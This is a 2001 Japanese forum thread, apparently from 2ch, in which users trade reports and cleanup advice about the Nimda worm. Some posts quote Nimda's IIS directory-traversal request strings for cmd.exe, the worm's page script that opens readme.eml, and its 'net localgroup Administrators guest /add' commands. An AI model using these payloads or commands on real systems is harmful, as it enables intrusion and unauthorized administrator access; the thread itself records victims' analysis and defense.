VMwareのバーチャルマシンにWin98入れて、Regmonとかで
レジストリを監視させといてreadme.exe起動して見れば？

もしくはノーマル状態のレジストリをあらかじめファイルに
書き出しといてから、readme.exe実行して、それもファイルに
書き出して差分を見るとか

うちは、該当ファイルを手動で削除、んで、最新のウィルスソフトで
削除して、system.ini　から削除して・・・

全社食らったので、ネットワークって何！？じょうたいですね。

レジストリは当面放置して、明日またゴミデータ増殖していたら
明日は休業ですね。

添付ファイルを不用意に開けるセキュリティーホールを
埋めるパッチ出せ。>>MS

>>410
サンクス、その方法もやってみます

サーバーは１年前のまで取ってあるんだけどね〜

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-19 14:09:59
#Fields: time c-ip cs-method cs-uri-stem sc-status
14:09:59 211.202.10.83 GET /default.ida 200
14:12:51 211.210.93.19 GET /default.ida 200
14:16:10 211.49.90.14 GET /default.ida 200
14:19:21 211.207.8.21 GET /default.ida 200
14:20:45 211.115.196.215 GET /scripts/root.exe 404
14:20:45 211.115.196.215 GET /MSADC/root.exe 404
14:20:47 211.115.196.215 GET /c/winnt/system32/cmd.exe 404
14:20:47 211.115.196.215 GET /d/winnt/system32/cmd.exe 404
14:20:49 211.115.196.215 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:20:49 211.115.196.215 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:20:51 211.115.196.215 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:20:51 211.115.196.215 GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe 500
14:20:53 211.115.196.215 GET /scripts/..ﾁ../winnt/system32/cmd.exe 404
14:20:53 211.115.196.215 GET /scripts/winnt/system32/cmd.exe 404
14:20:55 211.115.196.215 GET /scripts/../../winnt/system32/cmd.exe 404
14:20:55 211.115.196.215 GET /scripts/..\../winnt/system32/cmd.exe 404
14:20:57 211.115.196.215 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:20:57 211.115.196.215 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:20:58 211.115.196.215 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:20:58 211.115.196.215 GET /scripts/..%2f../winnt/system32/cmd.exe 404
14:24:27 211.189.161.194 GET /scripts/root.exe 404
14:24:29 211.189.161.194 GET /MSADC/root.exe 404
14:24:31 211.189.161.194 GET /c/winnt/system32/cmd.exe 404
14:24:32 211.189.161.194 GET /d/winnt/system32/cmd.exe 404
14:24:34 211.189.161.194 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:24:35 211.189.161.194 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:24:37 211.189.161.194 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:24:38 211.189.161.194 GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe 500
14:24:38 211.189.161.194 GET /scripts/..ﾁ../winnt/system32/cmd.exe 404
14:24:40 211.189.161.194 GET /scripts/winnt/system32/cmd.exe 404
14:24:42 211.189.161.194 GET /scripts/../../winnt/system32/cmd.exe 404
14:24:43 211.189.161.194 GET /scripts/..\../winnt/system32/cmd.exe 404
14:24:45 211.189.161.194 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:24:46 211.189.161.194 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:24:48 211.189.161.194 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:24:50 211.189.161.194 GET /scripts/..%2f../winnt/system32/cmd.exe 404
どういうこと？？？

MSに賠償金請求できないかなぁ・・・

感染しました。WIN98SE IE5.5更新0
ADSLルータモデムでＮＡＴ機能を利用しての接続です。

>64のサイト
ソースが
<html>
<body bgcolor=black>
<br><br><br><br><br><br>
<table width=100%><td>
<p align="center">
<font size=7 color=red>fuck USA Government</font>
<tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td>
<p align="center">
<font size=4 color=red>contact:[email protected]</html>

<html>
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
</html>

だったのでjavascriptを切って訪れたのですが。
感染源が違うのかも？と思って、
アンチウィルスにより修復後、再度他にも考えうる限りの
セキュリティを切ってみてアクセスしてもまた感染しました。

自業自得だけどガ━━（ﾟДﾟ;)━━ン！

>>420
14:24:38 211.189.161.194 GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe 500

500・・・？

感染すると壁紙を含めwebの画像が表示されなくなるとかいうのはありますかね？

>>418

んだ。.emlファイルを許可無く開けなくしろ。

>>420

４０４なんだからいいよ
俺なんか２００で持ってかれちゃったよ

>>424
ウチではありません。
ただ、自己増殖中にうんざりメモリーくってシステムそのものが
物凄く晩くなったりします。当然表示も。
久しぶりに走査線の順に表示されるのを見ましたから

あと、増殖中に桜時計がやたらと時間を合わせ様と（？）アクセスを
開始してました。

IE系のタブブラウザでも影響受けるのかな？
とりあえずSP2で凌いでるけど。

感染したらどうしてりゃいいの？
接続切って？ほいで？？？？

>>429
粗大ごみの日に表に出しとく。

420みたいなログってどうやってみるの？
どうやったら感染がわかるの？

Ｃドライブ共有してると、デスクトップにメールが
直接届くのにはﾜﾗﾀよ

>>430
それを俺が拾う

>>428、>>429
ここでも読んでおきなさい。
一応たいていの情報は集まってる。
http://keisui.com/GIGAZINE/cgi-bin/news/html/newsbav.html

回線切って首つって氏ね

とりあえずネットに繋がないようにすれば周りにまき散らさないからｲｲﾝｼﾞｬﾈｰﾉ？

NHKよくやった。

>436
ＮＨＫがなにやったの？

>>435
ネットに繋がないで、自分のマシンの中で
暴れるのを楽しむのに一票(w

>>432
ネットワーク共有フォルダがあると各階層に漏れなくメールとDLLと
その数分のtmp.exeがプレゼントされます。

頼む！教えてくれ(￣人￣)

>>427

> あと、増殖中に桜時計がやたらと時間を合わせ様と（？）アクセスを
> 開始してました。

なんかネット的に再接続しまくるみたいですね。ノートンのインターネットセキュリティー入れてたけど、mmc.exeの接続許可を何度も求められた。

>>440
鯖立てなさい（w

>>418
出てるって。上ミロyo-!
MS01-020
ちなみに、有る感染鯖から落したreadme.eml同じmimeヘッダ使ってた。
Content-Type: audio/x-wav;
name="readme.exe"
コレは発見当初と同じ穴。

>>432

お、おおお。おお・・。

>>440
鯖は立ててるの？

あ、鯖立てないと見れないのか・・・
Meじゃ無理ですね残念。。。
感染してるか心配じゃ〜。
>>442さんありがとう

>>440
あなたに鯖なんてすぎた代物です。
アホ鯖立てて迷惑かけないように。

>>439
そうそうご丁寧に１フォルダ１セットずつおいてくよなー。
なんかまめな奴

おちおちネットサーフィソもできやしない・・・。

逆アセンブルしてたら、なにげな〜くプロセス実行
しようとしてた。あぶね〜（汗　もう今日は寝よう。
会社のマシンにパッチ当てまくって疲れたし・・・

ウチのファイルサーバＬｉｎｕｘなんだが
システム本体はすっとぼけていたが、共有フォルダは
笑えるほどのメールが・・・
　ＮＡＳにいたっては40Ｇの空間が・・・大笑いさ( ´Д｀；)

いいかげんIIS使う奴が減ってくれれば・・・

テレ東でウィルス情報やるですよー。CM明け

>>443
「初心者が」って意味だったんだが。分かりにくかった。
すまん。

・・・これだけかよ（笑）

>>451

てこたぁ、マカもWeb公開するフォルダを共有してたら踏み台になれるってこと？

>>423

Error500　サーバーエラー。ＣＧＩ周りで出ることあるよ。

↓見てみれ。感染サイト数増えてるぞ。

http://search.fresheye.com/?kw=readme.eml&term=monthly

対策してないヤツは、見てもいいが、リンクはふむなよ！

port80をオープンにして「\n\n」送り返すソフト作ったんだけど
３０分で４００アクセスあったよ

>>458
確実に増えてる。
昨夜は14とか18だったのにね。

とりあえずこれ作ったヤツ逮捕されたら
全世界同時中継公開死刑

ttp://www5.ocn.ne.jp/~sproom/sp.htm

>>458
ﾜﾗﾀ

これもCodeRedといっしょでIISに感染するんだよね？
鯖立てたマシンでネットサーフィンしてる奴とわけもなく送られてきた変なファイル実行する奴が沢山いたってことでいいの？

>>451

そこがWeb公開されていたら、Linuxも感染したように外から見えるわけ？

>>464
全然ダメだ

営業に言われるがままにサーバーを導入して放置。
これ定説

俺のノートパソのメモリ192メガのはずなのに、今見たら64メガしかない。
やられたの？

readme.emlとかは発見できなかったけど・・・

ヴァカを承知で聞くけど、
Ｎｉｍｄａってマックにも感染するの？

　さて、では愚痴も聞いてもらったし
レジストリＢａｃｋＵＰ取って順番に削るとするか

　爆弾の赤と青、どっちのコード切る？

胡散臭いメールの添付ファイル実行する奴ってどんな奴なのよ？

>>471
それは、>>469みたいな人とかです

>>431
windows2000付属のIISのログだよ
apacheでも同じだよ

>>464
それはほんの一部。

>>469
Macは感染しないよ。
相手にされていないから。

>>458
「出勤予定: 火曜日・水曜日・木曜日・土曜日・日曜日 店長の一言 1顔はおとなしめですがエッチが大好き。
いろんなプレイを楽しんでください。..」
・・このサマリー何処とは言わない（ｗ
今、止まってる？？

感染した奴らって被害者面してっけど、不用意に添付ファイル開いたりJavaOnでネットしてたり、ちょっと不用意なんじゃないの？
企業や官庁が感染したって公表してんのって自分ら馬鹿ですって言ってるようにしか見えないんだけど。

>>472
ヴァカにするならせめて教えてやれよ。根性悪いなお前。

>>471
　ビル・ゲイツ

感染してるかどうかわからん奴は、
ネット切断したほうがいいぞ！
>>41 の方法で、何されるかわからんぞ！

>>477
変なサイトまわったりしない一般の人間のアクティブスクリプトが
ONになっててもおかしくはない。つーか本来はそれが当然。
なんの為のJavaScriptなんだろうな・・・

>>474
残りの大分はどうして感染したの？
コードレッドみたく妙なリクエストでオーバーフローさせてるわけじゃないでしょ？

>>475

MacでWebサイト立ててて、そこWinとファイル共有してたら、Macからでも感染するんじゃねーの？

こういうのMacも感染て言わねぇ？

というか、感染したのが大学ってのは情けない。

IEのSP2ってセットアップファイルのみのダウンロードって
できるん？

>>484
大学はザルだよ。
感染しても始末書も責任問題もない。
ネットワーク委員会の連中でログの見方が分かる奴もいない。

>>480
readme.exe見てみればわかるけど、わざわざguest
ユーザーを追加してるのが怖いな

>>41
そうなのね。セキュリティ設定、、アカウント追加するね。
guest。
俺、2k鯖立てて無いけど、おもわづ確認した。

あ？

>>41

ってことは、いま感染してるサイトのIP調べると、ログオンできちゃうと・・？

うちの近くの大学もご臨終。

>>483
いわねぇ

>470
折角だから俺は赤のコードを選ぶぜ！！

…と、470は言って欲しかったものと思われ。俺も言いたかったからいいけど（ｗ

ホームページはＭＳＮのままで、買ったときについてたＩＥをそのまま
使ってて、まっとうなサイトを見るのを楽しみにしてる人が被害者なのね・・・。

>>477
　普通の企業の偉いさんは、仕事の知識と経験の換わりに
ＰＣに関してはその通りですね。
　だからサーバーは無害　その下にぶら下がっているのは
凄惨を極めてますね。
　

>>482
CodeRedIIなどが作ったバックドアから感染。

>>482
社内ＰＣのローカルファルダに日本語ファイル名.emlで置いてあったら
「これなんのファイルだっけ？」とプレビューするのが人間心理だよ。

ネスケでも感染するのかな？

ネットにつないでもすごく重くて、
オンラインスキャンに辿り着けず、
検索でreadme.exeを探そうとしても、めちゃくちゃ時間がかかります。
諦めてノートン買ったほうがいいですか？

>>493
世の中、そんなもんです。

久々にふぁっくじゃぱにいずこむスクリプトでも見てみるかな

>>498
ノートン買うなら10月まで待て。

買っときなさい。
いい機会だ。
パッチも当てとくように。

しっかし、なんでMSNのサーバがやられたのん？
パッチ当ててなかったのか？それがどーにもピンとこないんだわ。

>>498
「mep」を検索してみろ。感染後はこれが膨れる。

んじゃ感染してるかどうか確認すんのに、コンソールからゲストでログイン試すってのも有効だね。

>>501
新バージョンまでまてとかゆー状況じゃないだろ。
そもそも、どれでもいいから AntiVirus ソフトひとつも入れてないって
やつは速攻で首をつるべし

>>496
共有フォルダに"美由紀の日記.html"ってブラクラ置いておいたら被害者続出した。
結構ﾜﾗﾀ

>>498
ワームは活動を開始するとマシン内のc:\Windows\tmpディレクトリに以下のファイルを作成します：

　　　・c:\Windows\tmp\mep????.tmp
　　　　（「？」は任意の半角英数字　例：mep1234.tmp）

　　　・c:\ADMIN.DLL

この２つのファイルはワームが添付されたメールファイルです。

　　　・c:\Windows\tmp\mep????.tmp.exe
　　　　（「？」は任意の半角英数字　例：mep1234.tmp）

このファイルはワーム本体のプログラムファイルです。

　
次に、ワームは以下の方法で自身のコピーを頒布します：

>>503
見つかってない感染ルートがあるんだろな

>>506
注意して使って、頻繁に再インストールしてりゃワクチンなんかｲﾗﾈｰﾖ。
それよりFW導入すべし。

>>503
クライアントからの共有かＦＴＰだろ

>>491

ニムダ、Macから感染！な。

>>507
今日の被害者は「お茶くみ当番.eml」だったらしい・・

>>509
セキュリティホールはパッチ出来てから公開するのが通例ですね

>>510
そのうちBIOSまで壊されるに一票

自分は実害なしでヒトには感染させて「ﾎﾄｼﾀｰﾖ」か。気楽なもんだ＞マカ>>491

>>510
ポート80開いてりゃFW通過するよ。

>261のリンクに入ったらノートンがこんなログ残していきました。

「日付: 2001/09/19 ､ 時刻: 23:49:42 ､ 既定 (OEMCOMPUTER 上)
ﾌｧｲﾙ
C:\WINDOWS\Temporary Internet Files\Content.IE5\IVQGY8JN\203.252.132[1].htm は
W32.Nimda.A@mm(html) ｳｨﾙｽに感染していました｡
ﾌｧｲﾙは修復されました｡」

WindowsMEとIE5.5SP2でスクリプトオフにしてもアンチウィルスソフト入れて
なければアウトってことですか？

>>491 言い逃れしてねえで対策しろ>>ﾏｶ

>>518
いや、Norton は IE が脆弱性持ちのバージョンか否かに
かかわらず警告発しまっせ。

>518
いや、キャッシュに残ってるｈｔｍｌファイルの中身に反応しただけだから
君は安全。

>>518

> WindowsMEとIE5.5SP2でスクリプトオフにしてもアンチウィルスソフト入れて
> なければアウトってことですか？

さっきからそう言っている。

>>510
FWは意味無いんだよ。
うちはFWが有るから安心だよガハハハ！ってところが軒並み感染してる
んじゃよ。
会社はちゃんと専任の管理者をつけて日々チェックしてないとダメよん。

>>523
そだね。いったん内側から発生したらオシマイ

>>510
こーゆーセキュリティの基礎すらわかっていないDQNこそが最悪の加害者だな。

>>522
アウトってことは無いんじゃない？
テンポラリーフォルダーに保管されても問題ないと思うのだが・・
確かにノートンは反応するけどね

このくらい強力な感染力だとアンチウイルスソフトも
あんまし役に立たないけどなー

>>510
今回は受動的攻撃だから、従来の Firewall で防御するのは難しいね。
Firewall を過信してるやつに限って感染するもんだよ。
クライアントもサーバーも、すべてのシステムがセキュアに維持
されるように心がけないとダメ。

>>518
キャッシュ。。。感染じゃないと思う。
俺はウイルス良く？落すけど、キャッシュ消すの忘れて
後でスキャンして反応出てから、苦笑いすること良くあ
るよ（w
取り合えず、キャッシュはマメに消しとく事。

>>527
そんなこたーないだろ。
ユーザーがタコだと宝の持ち腐れってこった。

>>526

スマソ、言い過ぎた。

でも、これが不意に開いたりしないんだろうか。
たとえばオフライン状態でこのキャッシュのサイト開いたらこのキャッシュが開くだろう。

だから、アンチウイルスソフト入れないとアウト、っていうのはそのとおりなのでは・・。

>520,521
速攻でファイル検索したけど実害なくてよかったです。
ちょっとヒヤッとしました。
>522
それはホンマですか？？コワッ！
入れててよかった…

winMXでも感染するんでしょうかね？

>>526
今回のnimdaはパッチで十分だけど、アンチウィルス
ぐらい入れとけよってことでしょ

はっきりいってサーバーやられたがどうしようもないんで再インストール
した。patch当ててたつもりが1台だけ当たってなかった、不覚だった。
プロキシサーバだったんでクライアント全滅。

超がいしゅつだと思うんですが
IE5.00はどうなの？

>>531
んなこたぁない

CodeRed の時もそうだったけど、社内に持ち込まれた感染ノート
PC から社内 LAN に一気に広がったところが今回も結構あったんじゃないかな？
まぁ、いずれにしても、今時 Firewall おいてあるから大丈夫なんて
呑気なこと言ってる奴は逝ってヨシ。

>>523-528
ここらへんの意見が一致したので少し安心した。
セキュリティを維持する事の大変さと重要性を知るのに良い機会になるかな。

今回は無数にある穴の一つをつかれただけに過ぎない事を忘れずに。
まだまだこれからじゃよー。

>534
まあそういうことなら、同意
ただ、わかってない人を必要「以上」にビビラセルのもどうかと

でも難しいよね
初心者って必要以上にウイルスに関してビビル一方で
わかっている人間から見たら考えられないぐらい危険なことを平気でやったりする。

バランスの問題かな。

systemフォルダのload.exeと隠しファイルのloadファイル、および
書き換えられたriched20.dllがいろいろやってるっぽいんだがどう?

system.iniのshellの行を元にもどしても、すぐに再起動しないと
また書き換えらる。system.iniファイルを常に監視でもしてんのか?

>>539
違う。もう一度このスレ読むべし。

>>539
つーか>>510がバカすぎなだけ。
近頃のウイルスやワームはファイアウォールがあるのは前提で、空けられているポート
（80や25）をねらってくるのは当たり前。
まともな管理者ならファイアウォールが気休めに過ぎないのは常識。

サイバーテロとの噂の真相はどうですか？
ＦＢＩも調べてるみたいですが

>>529
了解です。
なんかNimbaに出会ってネットの怖さを始めて知ったような
気がしました。

Ｍａｃ，ｗｉｎＭＸ，ＩＥ５．００，
結局感染するかどうか誰も答えられないの？

自分と同じ第一オクテットに攻撃してるとすると
第一が１９２とか１７２のグローバルもってるやつは
すごいことのになってそうだね。
それともプライベートだと処理変えたりするのかなあ。
たまにくる第一オクテットが違うやつがそれだったりして。

>まぁ、いずれにしても、今時 Firewall おいてあるから大丈夫なんて
>呑気なこと言ってる奴は逝ってヨシ
禿げしく同意！
まあ厨房管理者でしょ、そういうこと言ってるのは、企業の管理者が
そういうことを逝ってないことを祈る・・
クライアント使用者は厨房（つーか初心者）であることを前提に
管理者だけでもしっかりせんといかんな。

＜問一＞
readme.exeが検索で見つかった。
削除した。
もう平気か？

>>546
(ﾟДﾟ)ﾊｧ?

510だけどなんでそんな叩かれなきゃいけないんだ？
ワクチンなんかより頻繁にHD初期化すんのが一番の対策だろ。
ファイヤーウォール過信してるわけじゃないが、マカフィーやらウィルスバスターやらなんかよりはよっぽど効果的だと思うが。
PFWね。

>>546
Mac：×
WinMX：○(zipやexeファイルに感染)
IE5.0：○(javascriptでreadme.eml読まれてあぼ〜ん)

マック7600／200、愛Ｅ5.0
感染しません。見捨てられました。

>>546
過去ログ見れ

WIN-XP出たら、どうなる事やら。。。
俺は、リモートデスクトップ絶対捨てる。
捨てたら動かないなんて言うなよな＞My糞。

>それともプライベートだと処理変えたりするのかなあ。

プライベートでも同じみたいですよ。

>>546

MacでWebサイト立ててて、そこ感染Winとファイル共有してたら、Macからでも感染すると思う。

でもMacが感染とは言わないらしい。Macから感染。

>>551
A．クソバカだから
いいから氏ねって。

>>551
みんな頻繁に初期化してるほど暇じゃないんだよ

IE5.00なんて今更使う必要ないでしょ・・・
更新しとけ

IE5.00のことをIE5.0と表記するから混乱する

>>555
俺もずっと前からそう思ってた。ついでにデフォルト付属の
ファイヤーウォール機能も使わない

>>552
ありがとうございます。

>>551
最近どっかのMLで
「マシンの調子が悪くなったら原因究明するよりマシン交換が先!
現場優先!　システム部なんて経費だけ食って役にたたねえ！」
という趣旨の発言をした奴を思い出しました。

>>551
話にならねえょ。

>>551
まあまあそういわずに。
企業サーバーの管理者ですか？
それとも自宅サーバー？
本当に頻繁にHD初期化する運用してるの？
それはそれですごいけど・
マカフィーやらウィルスバスターをなぜそこまで信用しないの？

とりあえず510が叩かれまくったのはFWの件だと思うんだけど

>>555
捨てるっつーか、接続許可しなければ動かないみたいよ。
それに、リモートデスクトップは単一のTCPポート使うだけなんで
Firewall で閉めるのも楽。

っつーか、SOAP とか何とか最近みんな TCP port 80 に重ねすぎ！
Firewall でフィルタできなくなるじゃねぇかｺﾞﾙｧ!

>>559
パッチ当てたくらいで安心してんのか？疑わしきは再インストールは常識だと思うが。

>>551

Webを１ページ見るたびに再インストールしろや

>>548
プライベートからは全部プロクシ経由にして、一般ＰＣから外部への
アクセスはシャットダウンすれば外部に被害をあたえる事は避け
られるね。（実際そうやってるとこも多い）
これからは内から外へのアクセスも制限するようになるかも。
住みにくい時代だ。

ゲイツは謝罪しる！！

>>551
うーん、チミのやり方で確実に防げるとすれば、再起動前に必ず
フォーマット掛ける設定しとかないとダメだね。
ある意味、こんな設定はウイルス指定。

>>568
君、その調子じゃどんなソフトも使えないね

ユーザーアカウント追加するコードってどこだ？無いような気がするが。
ソース追っかけるのってこんなに大変なのか・・・うひぃ

>>568
ムキになんなさんなって・
論点ずれちゃってるよ・

>>564
そーか、最近は、ハードの値段安いからな。
管理者の人件費は、PC何台位になるのかな？

>>568
確かに、感染してからパッチ当ててたんじゃ意味なし。
同意。

>>572

これでは不十分。

>>551 方式なら１ページ見るたびにフォーマット・再インストール。

>>574
GUESTを追加するって奴？
GUESTってローカルコンピュータのビルトインアカウントだったりすので
勘違いかも、という気が今強くしてる。

>>574
既出だったらスマンが、ソースコードどっかに上がってる？

>>571
使用許諾に同意できんのなら返品すりゃいい。

>>571
　　　　　＿＿＿＿＿
　　　 ／＿　　　　　　|
　 　 /.　＼￣￣￣￣|
　　/　　／　 ―　― |
　　|　 /　　 　-　　- |
　 ||| (6　　　　　　>　|
　| | |　　　　 ┏━┓|　　 ／￣￣￣￣￣￣￣￣
| | | | 　　　　┃─┃|　 ＜　正直、スマンかった。
|| | | | 　＼　┃　 ┃/　 　 ＼＿＿＿＿＿＿＿＿
| || |　|　　　￣　￣|

>>578
しかもすべてのドライブを・・・ってことになる。
何のデータも保存できないマシンになりますな。

readme.exeからstring（実はtdump）で文字列切り出したものの一部

38137: user guest ""
38153: localgroup Administrators guest /add
38193: localgroup Guests guest /add
38225: user guest /active
38245: open
38253: user guest /add

>>570
>プライベートからは全部プロクシ経由にして、一般ＰＣから外部への
>アクセスはシャットダウンすれば外部に被害をあたえる事は避け
>られるね。（実際そうやってるとこも多い）
企業LANであれば、これは基本（と俺はおもってる）
さらにプロキシでのウイルススキャン（htmlすべて）を
行う、さらに外部からのメールの受信もすべてスキャンする。
これで、かなり守れると思う。
といいつつ、上記すべて行っているのに
うちの会社ＬＡＮ内感染しました
フロッピーで持ち込まれたらお手上げ・

>>585
ユーザは何とかしてNimdaを持ち込もうと管理者の隙を衝くわけですな。

>>すんません
シャットアウトね
いきなりシャットダウンはねーだろ
（自分ツッコミ）

このウィルス、バグあるみたいね。

私のパソコンでウィルス実行したら、ウィルス自体がハングアップしてる。
ワトソン博士のログにも、残ってる・・・

>>570
でも、こんなのは？
添付ファイルで送られてくる。ダブルクリックで感染。HDD（ネットワーク共有含む）上
のdocやtxt、htmlファイルをスキャンしてメールアドレスを抽出。ネットワーク上のSMTP
サーバーを探して接続。スキャンしたメールアドレスに自分自身を添付して自動送信。
メールを使うなとはなかなか言えないと思うが。もちろんオプションとしてMAPIやNotes
のAPIをたたいたって構わない。

一応社内マシンにパッチ当ててきたけど、明日また感染マシンが増えてたらどうしよう・・・

>>537

かしいなぁ。

やはり入ってくる。ノートンインターネットセキュリティー動作させているのにどこから入ってくるんだ？

アンチウイルスで駆除済みにしているのに・・。

Win2KSP2にしていても、だ・・。

>>587
Yahooを開こうとしただけで電源を切られるとは厳しいポリシーですね

とか言おうと思ったのに

>>564
氏ね

>>584
うわーお。本当だったのか…

>>589
メールサーバで添付ファイルのフィルタリングは、
今後主流になるだろうね。

>>593
＞氏ね

俺が？　この発言した奴が？　それとも他の誰か？

>>590
バット振り回してWindowsマシンを破壊してください

>>593
名前見てなかったよ。
ご本人でしたか。

>>595

余談だけど、DoCoMo.ne.jpもやってくれないかな。

FromがRFC準拠じゃなかったら削除とか（苦笑）

>>594
追記

40073: net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"

まさに・・・

ドキュモは通信の秘密とかあるからね・・・・
しばらくダメかと。

>597
http://camaross.net/video/badday3.mpg
こんなふうに？（ｗ
・・・つっても、だれもリンク見にいかないんだろうなぁ。

>>580
感染サーバから落とした。
readme.eml、base64デコードして、ソース見てみると
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security share c$=c:\ user guest ""
localgroup Administrators guest /add localgroup Guests guest /add user guest /active open
user guest ・・・この辺なのかな〜。
#\CurrentControlSet\Services\[lanmanserver]\Shares\Security share
マカフィーのサイトだと[lanmanserver]の値消すって書いてあったけど。。
違うみたい？？

イもーどはメルアドに半角カナを採用すりゃいい。

>>551　は「感染予防」を必要としないのでしょうきっと。

感染したらフォーマット。ある意味それがいいのかもしれんが、まず感染しない
事が最重要。そのためにもアンチビールスソフトは必要。

新しいワームやウィルスに注意を払うのは当然のこと。
そのためにもＦＷや監視、情報収集は必要。

クライアントのことを考えると最悪一発目食らっても２次感染３次感染予防の為
にも、出来る限りの防御策をとっておくべきでないか？

>>602
最後窓から放りなげるやつかな（ｗ
うっ　落ち言ってしもうた・・・

>>584
げっ、被りまくり。。。
感染させて逝きます。。。

Nimdaってなんて読むのが正しいの。ニムダ？
さっきシステム管理課のやつらと行ったカラオケで、リンダリンダを
ニンダニンダって絶叫してた俺って恥？

>>608
逆から読むと・・・アドミン。
確かにアドミンだわ。。。勝手にユーザー追加して。

>>603

> #\CurrentControlSet\Services\[lanmanserver]\Shares\Security share
> マカフィーのサイトだと[lanmanserver]の値消すって書いてあったけど。。
> 違うみたい？？



こんなのばっかじゃまかふぃー信じらんないよ（´Д｀；）

McAfeeウィルス対策をコピペでぱくる
http://slashdot.jp/article.pl?sid=01/08/21/0428210

>>608
過去レスで「ニダ」って出てたけど
ニュースでは「ニムダ」だね。

以下はトレンドマイクロのコピペだ

ワームは活動を開始するとマシン内のc:\Windows\tmpディレクトリに以下のファイルを作成します：

　　　・c:\Windows\tmp\mep????.tmp
　　　　（「？」は任意の半角英数字　例：mep1234.tmp）

　　　・c:\ADMIN.DLL

この２つのファイルはワームが添付されたメールファイルです。

　　　・c:\Windows\tmp\mep????.tmp.exe
　　　　（「？」は任意の半角英数字　例：mep1234.tmp）

このファイルはワーム本体のプログラムファイルです。
いいか？わかると思うが、これが見つかったら、活動をはじめているって事だぜ！
とあるから、手動で検索するやつは、↑も検索シレ。

さっきのreadme.exeから文字列をtdumpで切り出したやつ

http://members.jcom.home.ne.jp/hangedman/readme_exe.txt

30000ぐらいから読める文字列

そういやこれってSMTPクライアントでもあるようだけど、
メール送られたって人まだいないね。Subjectとかどうなるのやら

>>608
「システム管理課」のやつらと「さっき」カラオケに行けたこと
自体が羨ましく感じてみたり。

>>602

これ知ってるo(^^)o

おれもやりたい（ぉぃ

>>613
強烈に長い無意味なカタカナの羅列が来てました

>>605
感染予防なんてやって当然であって、改めて言うことじゃない。
＞新しいワームやウィルスに注意を払うのは当然のこと。
＞そのためにもＦＷや監視、情報収集は必要。
は同意。
＞クライアントのことを考えると最悪一発目食らっても２次感染３次感染予防の為
＞にも、出来る限りの防御策をとっておくべきでないか？
と思うなら、万全の対策をした上でHDを初期化し再び対策をするのがベストでは？
対策ってのはあくまで一つの可能性を排除しただけで未知の穴つかれてる可能性だってゼロじゃないんだから。
違うかい？

>>616
あっ、そうか、感染してるとディレクトリの階層ごとにメールが
来たりするんだっけ。ふむ、そんな怪しい感じになるのか

　（￣￣￣）
　 ［ ((★))］
　<丶｀∀´> 　＜うまくいってるニダ！
　（''　　： ''）
　│| ｜　|
　〈＿フ__フ

>>617
パッチのインストールをためらうような管理者がそんなことやる訳ねーだろ(藁

Winとの共有Webフォルダのニムダ、Macのまかふぃーじゃ最新パラメータにしても発見出来ねーよ（´Д｀；）

>>617
未知の穴はフォーマットしようがＨＤＤ新品にしようがだめだろ。

61.74.124.119

とかから、アクセスがずうっとあるんだけどさ、
これって、関係ある？
Asia Pacific Network Information Centeｒ
全部ココ↑

>>623
Korea TelecomのADSLユーザだな。

>>624
クラック？

>>510=>>551=>>617
>注意して使って、頻繁に再インストールしてりゃワクチンなんかｲﾗﾈｰﾖ。
こんなイタイこと言っといて、今さらなに言ってもダメ。
いいから氏ねって。

>>623
君んトコのIPが61.*.*.*なのでは。
どこに繋いでんの？

http://isweb24.infoseek.co.jp/computer/titikun/CRhuri.htm
わかんねーやつはえ〜ん氏のページでも見ろ。

第一オクテットが211系から210系に変わったとたんに
Nimdaの攻撃が激減した

211系は韓国系が多かったけど
210系は台湾系が多い

>>627
オレはＡｉｒＨ”でＰＲＩＮなんだけど、
61.*.*.*
だよ、関係ないの？

今、ノートン先生のLiveUpdateしたら、
ウィルス定義が2001/09/18になった。
"2001/09/19"じゃないの？

そうか、ニムダは鯖・蔵両方に感染するから、話も混同されてしまうんだな。

>>632
何をいまさら

だれだよ、Macは感染しないって言ったの！

Web共有でパッチMacに置いて配ったら社内中に撒いちまってたよ（´Д｀；）

結局は、ディープな海外ウイルスサイトなんかも有効な情報元。
リンク辿れば、パッチ出る前に穴公開？されてる事有るし。
アプされてから、3ヶ月ぐらい経って流行したのはmagistr。

>>631
それでいいんだよ。

>>491

なんとか言えよ！（´Д｀；）

>>603
あ、netコマンドのコマンドラインだこれ。
ううぬ。APIじゃなかったノカー。

やっぱ素人仕事はダメだねー。がんばれSymantec。

>>634
意味が違うだろ

>>630=623
すこし前の方読むことを奨めるのだけれども、
要するに第1オクテット(この場合61)が同じとこに
スキャンしに行くので。Nimdaも。CodeRedIIもね。

MacでWindows用のプログラムが動くわけねーだろ。

Macがファイルサーバになったというだけで
「感染した」とは言わないよな。きっと。

>>637
いわねぇ

家のは今のところのチェックでは平気だったが
さっき知ったのばかりなので会社のが心配だよ・・・
今日、何か急にマシンが重くなっていたから
気になっていたんだが・・・
誰も気がつかないうちの会社は逝ってよし・・・

>>640
うん、読みに行くＹＯ

>>640
でも、これも明らかにテロだよね。
みんな法律的に逮捕できんのかなあ。
自衛隊のことなんてやってる場合ではないてのに

>>646
テロ？んなわけない。

>>646
馬鹿が淘汰されてるだけだ。
法的制裁など不要。

>>638
ほかにもWinZip32.exeってのもあったぞ。
WinZipが入ってなければZIPファイルに感染はないってことか

>>647
>>648
オレ的には、被害もないし、
